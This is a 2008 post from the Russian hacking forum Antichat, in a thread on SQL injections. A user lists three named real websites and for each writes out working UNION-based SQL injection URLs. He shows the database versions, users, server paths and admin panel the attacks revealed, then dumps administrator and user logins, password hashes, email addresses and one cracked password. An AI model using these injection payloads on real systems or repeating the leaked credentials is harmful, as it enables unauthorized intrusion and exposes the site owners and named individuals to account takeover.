ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 03.08.2008, 00:01
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию
http://popsdb.twystneko.com
Код:
http://popsdb.twystneko.com/list.php?id=1+union+select+unhex(hex(concat_ws(0x3a,version(),user(),database())))+limit+1,1--

version() - 5.0.51a-community
user() - twystneko@localhost
database() - twystneko
Раскрытие пути - /home/virtual/site198/fst/var/www/popsdb/list.php
Админка - http://popsdb.twystneko.com/admin


Далее, база с админом:
Код:
http://popsdb.twystneko.com/list.php?id=1+union+select+unhex(hex(concat_ws(0x3a,user_login,user_pass,user_email)))+from+nc_users+limit+1,1--
admin:2dfc97e5e093b4b339ad510433d2e9ff:cafe@nakedc ybercafe.com - расшифрованный пасс: naked

Ещё одна база всего с 1 человеком:
Код:
http://popsdb.twystneko.com/list.php?id=1+union+select+unhex(hex(concat_ws(0x3a,user_login,user_pass,user_email)))+from+bg_users+limit+2,1--
stephen:3e5a1b3b990187c9fb8e8156ce25c243:stephen@i crossroads.com

++++++++++++ Пойдём дальше.


http://dennis-oppenheim.com
Код:
http://www.dennis-oppenheim.com/list.php?id=-1+union+select+concat(0x3a,version(),0x3a,user(),0x3a,database()),1,1/*

version() - 5.0.51a-community
user() - twystneko@localhost
database() - twystneko
Раскрытие пути - /hsphere/local/home/rhjo2/dennis-oppenheim.com/list.php

++++++++++++ Пойдём дальше.


http://hivolume.com
Код:
http://www.hivolume.com/en/list.php?aftermarket_part=-1+union+select+aes_decrypt(aes_encrypt(version(),1),1),555/*
http://www.hivolume.com/en/list.php?aftermarket_part=-1+union+select+aes_decrypt(aes_encrypt(user(),1),1),555/*
http://www.hivolume.com/en/list.php?aftermarket_part=-1+union+select+aes_decrypt(aes_encrypt(database(),1),1),555/*

version() - 4.1.11-Max
user() - yads@localhost
database() - hivolume
Раскрытие пути - /home/sites/site4/web/en/list.php

++++++++++++
Так-же отдельное спасибо пользователям "sabe" и "Basurman", за помощь в вопросах по SQL.
Последний раз редактировалось Nightmarе; 03.08.2008 в 01:00..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ